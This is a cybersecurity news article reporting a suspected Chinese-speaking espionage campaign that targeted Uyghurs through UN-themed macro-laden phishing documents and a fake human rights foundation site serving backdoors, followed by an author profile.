article featured image


Security specialists have come across a new Chinese phishing campaign targeting the Uyghurs Muslims, a Turkic ethnic minority found in Xinjiang, China, with emails posing as the United Nations and others.

Researchers assigned the activity to a Chinese-speaking cybercriminal with low to medium confidence. They discovered extracts of the code in malicious macros utilized in the attacks which were similar to VBA code showing up in several Chinese forums, and which may have been copied directly from there.

These attacks clearly utilize the theme of the UNHRC to trick its targets into downloading malicious malware. We believe that these cyber-attacks are motivated by espionage, with the end-game of the operation being the installation of a backdoor into the computers of high-profile targets in the Uyghur community.


Phishing documents marked with the United Nations Human Rights Council (UNHRC) logo are being sent to the potential victims. The “official ” paper, dubbed UgyhurApplicationList.docx, includes misleading information connected to discussions of human rights contraventions.

However, if the victim authorizes editing on opening the file, VBA macro code then checks the PC’s architecture and downloads either a 32- or 64-payload.

Uyghurs cyberattack


Named “OfficeUpdate.exe,” the file is a shellcode that collects and fills up a remote cargo, but at the time of investigation, the IP was impossible to use.

Nevertheless, the domains connected to the malicious email attachment expanded the investigation further to a malicious website employed for malware delivery impersonating a human rights organization.

The “Turkic Culture and Heritage Foundation” (TCAHF) domain claims to work for “Tukric culture and human rights,” but the copy has been stolen from opensocietyfoundations.org, an authentic civil rights outfit.

This website, directed at Uyghurs looking for funding, attempts to entice users into downloading a “security scanner” before filing the details required to apply for a grant. But the software is actually a backdoor.

Even if only the link to the Windows version could download the virus, the website was also offering a macOS one.

WebAssistant that was served in May 2020 and TcahfUpdate which was loaded from October were discovered. These backdoors attain stability on user systems, carry out cyberespionage and data theft, and may be utilized to perform extra payloads.

It is believed that the potential victims have been situated in China and Pakistan in areas that are mostly inhabited by Uyghurs.

Both domains redirect to the website of a Malaysian government body called the “Terengganu Islamic Foundation.”

This suggests that the attackers are pursuing additional targets in countries such as Malaysia and Turkey, although they might still be developing those resources as we have not yet seen any malicious artifacts associated with those domains.


The researchers state that while the gang does not seem to share any infrastructure with other cybercriminals, they are probably Chinese-speaking and are still operative, with new domains registered this year to the same IP address linked to previous attacks.

Author Profile

Antonia Din

PR & Video Content Manager

linkedin icon

As a Senior Content Writer and Video Content Creator specializing in cybersecurity, I leverage digital media to unravel and clarify complex cybersecurity concepts and emerging trends. With my extensive knowledge in the field, I create content that engages a diverse audience, from cybersecurity novices to experienced experts. My approach is to create a nexus of understanding, taking technical security topics and transforming them into accessible, relatable knowledge for anyone interested in strengthening their security posture.

Leave a Reply

Your email address will not be published. Required fields are marked *